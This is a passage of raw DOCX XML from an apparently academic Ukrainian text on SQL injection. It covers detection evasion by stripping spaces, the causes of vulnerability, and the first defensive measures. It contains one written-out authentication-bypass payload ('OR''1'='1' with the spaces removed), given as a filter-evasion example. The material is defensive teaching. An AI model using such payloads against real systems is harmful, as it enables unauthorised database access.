      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">сигнатура відрізняється від </w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A51C84" w14:textId="77777777" w:rsidR="0019135A" w:rsidRPr="0019135A" w:rsidRDefault="0019135A" w:rsidP="0019135A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Видаляючи пробіли з оператора SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>не впливатиме на виконання деяких баз даних</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6343B6A3" w14:textId="77777777" w:rsidR="0019135A" w:rsidRPr="0019135A" w:rsidRDefault="0019135A" w:rsidP="0019135A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>’’1’=’1’ (без пробілів)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7909E846" w14:textId="52F3DA0E" w:rsidR="002F1513" w:rsidRDefault="0019135A" w:rsidP="004B547E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Більшість сучасних </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>signature</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>detection</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>engines</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> здатні виявити атаки пов’язані з різною кількістю та кодуванням пробілів в зловмисному </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> запиті.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001E04F3" w14:textId="77777777" w:rsidR="002F1513" w:rsidRPr="0019135A" w:rsidRDefault="002F1513" w:rsidP="00ED2EBE">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB56AC5" w14:textId="46DA649A" w:rsidR="0019135A" w:rsidRDefault="0019135A" w:rsidP="0019135A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc30433144"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.9 Захист від </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ін’єкцій</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w14:paraId="435234BF" w14:textId="77777777" w:rsidR="003E0621" w:rsidRPr="003E0621" w:rsidRDefault="003E0621" w:rsidP="003E0621">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA883C8" w14:textId="65F10FF7" w:rsidR="003E0621" w:rsidRPr="003E0621" w:rsidRDefault="003E0621" w:rsidP="003E0621">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0621">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Багато веб-розробники навіть не здогадуються, що SQL-запити можуть бути підроблені, і вважають, що SQL-запити завжди достовірні. Насправді підроблені запити можуть обійти обмеження доступу, стандартну перевірку авторизації, а деякі види запитів можуть дати можливість виконувати команди операційної системи.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF4A797" w14:textId="43BE6432" w:rsidR="0019135A" w:rsidRDefault="003E0621" w:rsidP="003E0621">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0621">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Пряме впровадження шкідливих інструкцій в SQL-запити - це методика, в якій зломщик створювати чи змінювати поточні SQL-запити для відображення прихованих даних, їх зміни або навіть виконання небезпечних команд операційної системи на сервері бази даних. Атака виконується на базі програми, що будує SQL-запити з призначеного для користувача введення і статичних параметрів.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A169FB6" w14:textId="7C6C450A" w:rsidR="003E0621" w:rsidRDefault="003E0621" w:rsidP="003E0621">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0621">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Завдяки відсутності перевірки користувальницького введення і з'єднанню з базою даних під обліковим записом суперкористувача (або будь-якого іншого користувача, наділеного відповідними привілеями), зломщик може створити ще одного користувача БД з правами суперкористувача.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C258080" w14:textId="77777777" w:rsidR="003E0621" w:rsidRPr="003E0621" w:rsidRDefault="003E0621" w:rsidP="003E0621">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="016D4ED1" w14:textId="51508FD2" w:rsidR="00156683" w:rsidRDefault="00156683" w:rsidP="00101F0F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc30433145"/>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Чому веб додатки вразливі до </w:t>
      </w:r>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ін’єкцій.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w14:paraId="7660D61D" w14:textId="77777777" w:rsidR="00156683" w:rsidRPr="00156683" w:rsidRDefault="00156683" w:rsidP="00156683">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488F6DF1" w14:textId="6DCBEA6F" w:rsidR="00156683" w:rsidRDefault="00156683" w:rsidP="00156683">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Сервер бази даних виконує команди ОС</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Інколи, сервер баз даних використовує команди ОС для виконання завдань. Атакуючий який скомпрометує сервер баз даних SQL ін’єкцією може використати команди операційної системи для виконання неавторизованих операцій.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EDA653" w14:textId="529142BA" w:rsidR="00156683" w:rsidRDefault="00156683" w:rsidP="00156683">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Використ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>овується</w:t>
      </w:r>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> привілейований обліковий запис для з’єднання з базою даних</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Розробники можуть дати базі даних обліковий запис користувача, що має високі привілеї. Атакуючий який скомпрометує такий обліковий запис може отримати доступ до бази даних і виконати зловмисну активність на рівні ОС.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B9AE51" w14:textId="7F6DA712" w:rsidR="00156683" w:rsidRDefault="00156683" w:rsidP="00156683">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Повідомлення про помилку видають важливу інформацію</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Якщо запит введений користувачем не існує або його структура неправильна, сервер баз даних відобразить повідомлення про помилку. Це повідомлення може надати важливу інформацію відносно бази даних, яку атакуючий може використати для виконання неавторизованого доступу до бази даних.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5456AD81" w14:textId="156B5A67" w:rsidR="004B547E" w:rsidRPr="004B547E" w:rsidRDefault="00156683" w:rsidP="004B547E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Не перевіряються вхідні дані на сервері (введення користувача).</w:t>
      </w:r>
      <w:r w:rsidRPr="00156683">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Це найбільш поширена вразливість, яка веде до SQL ін’єкції. Більшість додатків є вразливими до SQL ін’єкцій тому що використовують неправильну техніку перевірки (або взагалі немає перевірки) для фільтрації вхідних даних. Це дозволить атакуючому ввести зловмисний код в запит. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E2782" w14:textId="77777777" w:rsidR="004B547E" w:rsidRPr="00ED2EBE" w:rsidRDefault="004B547E" w:rsidP="00ED2EBE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7503D29D" w14:textId="2F1C1137" w:rsidR="00156683" w:rsidRDefault="00156683" w:rsidP="00156683">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc30433146"/>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Кроки, які допоможуть захиститися від </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-ін’єкцій</w:t>
      </w:r>
      <w:r w:rsidRPr="00156683">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w14:paraId="7CD43BB7" w14:textId="77777777" w:rsidR="00156683" w:rsidRPr="007A61FB" w:rsidRDefault="00156683" w:rsidP="007A61FB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1673AD30" w14:textId="22B0D09E" w:rsidR="00156683" w:rsidRDefault="00156683" w:rsidP="007A61FB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A61FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Реалізації узгодженого стандарту кодування, мінімізація привілеїв, і брандмауер на сервері все це може допомогти в захисті від SQL ін’єкцій.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744014C3" w14:textId="6F076214" w:rsidR="007A61FB" w:rsidRDefault="007A61FB" w:rsidP="007A61FB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A61FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Мінімізація привілеїв</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="007A61FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Розробники часто нехтують аспектами поки створюють новий додаток, і як правило, залишають ці питання до кінця циклу розробки. Проте питання безпеки повинні бути в пріоритеті, і розробники повинні включити адекватні кроки до початку стадії розробки. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="007A61FB">
        <w:rPr>
          <w:sz w:val="28"/>
